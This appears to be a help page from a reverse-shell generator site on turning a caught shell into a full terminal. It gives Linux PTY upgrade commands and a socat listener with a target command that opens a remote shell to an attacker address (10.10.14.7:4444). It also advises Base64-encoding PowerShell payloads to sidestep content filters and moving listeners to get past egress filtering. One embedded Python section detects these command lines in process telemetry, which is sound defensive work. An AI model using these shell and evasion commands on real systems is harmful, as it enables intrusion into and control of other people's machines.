From raw shell to a real terminal
A freshly caught reverse shell is brittle: no job control, no tab-completion, and one stray Ctrl-C kills the whole session. Stabilizing it turns that dumb pipe into a proper PTY you can actually work in.
Why stabilize
The initial shell runs without a controlling terminal. Interactive tools like ssh, su, sudo, and text editors expect a TTY and will either hang or refuse to run. Stabilization also restores arrow-key history and lets you background processes safely.
Linux: the PTY upgrade
The canonical sequence on a Linux target:
# 1. spawn a PTY inside the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# 2. background it (Ctrl-Z) back to your local terminal
# then fix the terminal modes:
stty raw -echo; fg
# 3. re-enable a sane environment in the shell
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 50 columns 200 # match your local window
No Python on the box? Try script -qc /bin/bash /dev/null, or fall back to a socat payload, which delivers a PTY without any manual upgrade.
socat: skip the dance
If socat exists on the target, you get a full terminal in one step. Start the raw listener on your box:
# attacker
socat -d -d TCP-LISTEN:4444,reuseaddr,fork FILE:`tty`,raw,echo=0
# target (from the generator)
socat TCP:10.10.14.7:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
Windows notes
PowerShell reverse shells already give a usable prompt, but they are not true PTYs. For interactive parity, upgrade with ConPtyShell or pivot to a framework session. When a payload is filtered, reach for the Base64 toggle in the generator: it emits a ready-to-run powershell -enc command that sidesteps quoting and many naive content filters.
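Seen from the defending side, each upgrade command above leaves a recognizable process command line. The sketch below is an added example, not code from this page or its generator: it matches those command lines in process-creation telemetry and raises severity when the parent is a network-facing service. The event layout, rule names, parent list and sample events are assumptions constructed for illustration.

```python
import base64
import re

# Rule names and the event layout are this example's own assumptions.
RULES = [
    ("python-pty-spawn", re.compile(r"\bpython[0-9.]*\s+-c\s+.*\bpty\.spawn\s*\(")),
    ("script-pty", re.compile(r"\bscript\s+-\w*c\w*\s+\S*sh\b.*/dev/null")),
    ("socat-exec-pty", re.compile(r"\bsocat\b.*\bEXEC:.*\bpty\b", re.I)),
    ("powershell-enc", re.compile(
        r"\bpowershell(?:\.exe)?\s+(?:.*\s)?-(?:e|ec|enc|encodedcommand)\s+"
        r"[A-Za-z0-9+/=]{16,}", re.I)),
]
# A PTY spawned under a network-facing service is far more suspicious
# than the same command typed in an administrator's login shell.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "node", "w3wp.exe"}


def triage(events):
    """Return (rule, severity, cmdline) for each event matching an upgrade pattern."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                sev = "high" if ev["parent"] in SERVICE_PARENTS else "medium"
                hits.append((name, sev, ev["cmdline"]))
                break  # first matching rule is enough for triage
    return hits


# Constructed sample telemetry (not captured from any real host).
_BLOB = base64.b64encode("Write-Output 1".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "apache2", "cmdline": 'python3 -c import pty; pty.spawn("/bin/bash")'},
    {"parent": "sh", "cmdline": "script -qc /bin/bash /dev/null"},
    {"parent": "php-fpm",
     "cmdline": "socat TCP:192.0.2.10:4444 EXEC:bash -li,pty,stderr,setsid,sigint,sane"},
    {"parent": "w3wp.exe", "cmdline": "powershell -enc " + _BLOB},
    {"parent": "bash", "cmdline": "script -a session.log"},          # benign
    {"parent": "systemd", "cmdline": "socat TCP-LISTEN:8080,fork TCP:192.0.2.20:80"},  # benign
    {"parent": "bash", "cmdline": "python3 -c print(1)"},            # benign
]

if __name__ == "__main__":
    for rule, sev, cmd in triage(SAMPLE_EVENTS):
        print(f"{sev:6} {rule:18} {cmd}")
```

Encoded PowerShell is also used by legitimate management tooling, so treat that rule as a hunting lead to correlate with parent process and network activity rather than a verdict.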
When to encode
Encoding is about transport, not stealth in itself:
- URL-encode when the payload travels through a query string, form field, or other HTTP context that would mangle spaces, quotes, and ampersands.
- Base64 when quoting is the enemy — nested shells, log-poisoning, or constrained input boxes. The generator wraps the encoded blob so the target decodes and executes it automatically.
It connected, then died
- Instant disconnect: the interpreter is missing or the wrong path. Re-enumerate and switch payloads.
- Connects but no prompt: often an nc build without -e. Use the mkfifo variant.
- Nothing at all: egress filtering. Move the listener to 443 or 80 and retry.
- Garbled keys after stty: run reset in the remote shell, then redo stty raw -echo; fg.